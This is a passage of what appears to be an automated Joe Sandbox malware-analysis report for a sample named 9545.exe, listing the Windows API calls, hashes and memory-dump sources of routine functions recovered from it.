                                                • Instruction ID: b79032affa92316e71b8f1b98c1502161941449a71c5d80d1fb9f86c40c65c7e
                                                • Opcode Fuzzy Hash: 2dd80d3d45f5769736b1003ddfaa82324426ba9da2e35887428e1f20a456f4f0
                                                • Instruction Fuzzy Hash: 0B11A5B26006856ED611377BDCC1E6B2659DFC1774B7A4234F128B61E1EE628C8A5131
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00DF0120,00000000,?,00DF4DD3,00000000,00000000,00DF0120,?,?,00000000,00000000,00000001), ref: 00DF003A
                                                • GetLastError.KERNEL32(?,00DF4DD3,00000000,00000000,00DF0120,?,?,00000000,00000000,00000001,00000000,00000000,?,00DF0120,00000000,00000104), ref: 00DF0044
                                                • __dosmaperr.LIBCMT ref: 00DF004B
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                • String ID:
                                                • API String ID: 2398240785-0
                                                • Opcode ID: 360a233b54fc8788875c5efc482f643a3750223c3373763d521a41e292bbdc3c
                                                • Instruction ID: 3064feb7bfe48109abf72bdff46bb33146d3e5bb1139d9df685bd2b206022c61
                                                • Opcode Fuzzy Hash: 360a233b54fc8788875c5efc482f643a3750223c3373763d521a41e292bbdc3c
                                                • Instruction Fuzzy Hash: 8AF0FB32201119BBCB206BA6DC08A6BBFA9FF453A07068511B61DD7421CB32E8619BF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00DF0120,00000000,?,00DF4E48,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00DEFFD1
                                                • GetLastError.KERNEL32(?,00DF4E48,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00DF0120,00000000,00000104,?), ref: 00DEFFDB
                                                • __dosmaperr.LIBCMT ref: 00DEFFE2
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                • String ID:
                                                • API String ID: 2398240785-0
                                                • Opcode ID: bf7bf2ac610dfd2afa0ee81093be5808457268c9e2c86ca9967308789e7b5127
                                                • Instruction ID: 58145ae82a4f3c71e173024b2a6d71c0ba0cf1d52213e24d640864b0cf3c06be
                                                • Opcode Fuzzy Hash: bf7bf2ac610dfd2afa0ee81093be5808457268c9e2c86ca9967308789e7b5127
                                                • Instruction Fuzzy Hash: 3EF04B32200159BBCB206BA7C808A5ABFAAEF443A07058521F61DD7421DB32E8A1D7F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteConsoleW.KERNEL32(00DD59B0,00000000,00E08B30,00000000,00DD59B0,?,00DF71D8,00DD59B0,00000001,00DD59B0,00DD59B0,?,00DF460B,00000000,?,00DD59B0), ref: 00DF7AD6
                                                • GetLastError.KERNEL32(?,00DF71D8,00DD59B0,00000001,00DD59B0,00DD59B0,?,00DF460B,00000000,?,00DD59B0,00000000,00DD59B0,?,00DF4B5F,00DD59B0), ref: 00DF7AE2
                                                  • Part of subcall function 00DF7AA8: CloseHandle.KERNEL32(FFFFFFFE,00DF7AF2,?,00DF71D8,00DD59B0,00000001,00DD59B0,00DD59B0,?,00DF460B,00000000,?,00DD59B0,00000000,00DD59B0), ref: 00DF7AB8
                                                • ___initconout.LIBCMT ref: 00DF7AF2
                                                  • Part of subcall function 00DF7A6A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DF7A99,00DF71C5,00DD59B0,?,00DF460B,00000000,?,00DD59B0,00000000), ref: 00DF7A7D
                                                • WriteConsoleW.KERNEL32(00DD59B0,00000000,00E08B30,00000000,?,00DF71D8,00DD59B0,00000001,00DD59B0,00DD59B0,?,00DF460B,00000000,?,00DD59B0,00000000), ref: 00DF7B07
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: 36000261fd0987af7b834e856efc4ded2325e253e48927593d8c07725adfda49
                                                • Instruction ID: e83baf0c5bdecf5cec27d59b91bf78f43e80780d512556b0306c83bd878f684f
                                                • Opcode Fuzzy Hash: 36000261fd0987af7b834e856efc4ded2325e253e48927593d8c07725adfda49
                                                • Instruction Fuzzy Hash: 1AF01C3650421CBFCF625FD6EC04FD93F26FB497A1F4A8410FA1CA5120DA3289A4DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread$Sleep
                                                • String ID:
                                                • API String ID: 422425972-0
                                                • Opcode ID: b22ddc1696b551c0b1440d9798fa19a5931f7dbe4377470773f5ad61a2b2f8bd
                                                • Instruction ID: bfb1ed0d7112b13a2fbd5acb5fa0fbcc80e8b17f627da2c1d9a90d0ff50d1e26
                                                • Opcode Fuzzy Hash: b22ddc1696b551c0b1440d9798fa19a5931f7dbe4377470773f5ad61a2b2f8bd
                                                • Instruction Fuzzy Hash: 35E09236FE83A47AF0B062E26C03F5A2A054B28F92F304082B70C3E0D488C0B4484BFD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\AppData\Local\Temp\9545.exe
                                                • API String ID: 0-1776105196
                                                • Opcode ID: c59e7108f09a05e25c1bf6a14c27d1291e8c87cde54e01360d528a16e12f31f5
                                                • Instruction ID: 057b6891b0b0a30a9f31dd49f22265e750b846fe0d680fc9f2b9585f2cdbc71a
                                                • Opcode Fuzzy Hash: c59e7108f09a05e25c1bf6a14c27d1291e8c87cde54e01360d528a16e12f31f5
                                                • Instruction Fuzzy Hash: DA419571A00258AFDB11BF9BDCC19AEBBB9EF85310F15406AF409A7211EF719A41CB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00DE3470
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileModuleName
                                                • String ID: 5120$H
                                                • API String ID: 514040917-2391956277
                                                • Opcode ID: ac74c9b6fdb6a8a5cbb661549ab19725d7999a5f8e16eb36c0b06dc539bf2ace
                                                • Instruction ID: 8738d219e2ee7d681c57eda356c19f36c91d32976ce6dd953f8025bd8dcbcd2b
                                                • Opcode Fuzzy Hash: ac74c9b6fdb6a8a5cbb661549ab19725d7999a5f8e16eb36c0b06dc539bf2ace
                                                • Instruction Fuzzy Hash: 2E218CB0904288ABDB65FF29C91A7DD7FB8AB06304F5005CDE5482B282D7755B488BB3
                                                Uniqueness

                                                Uniqueness Score: -1.00%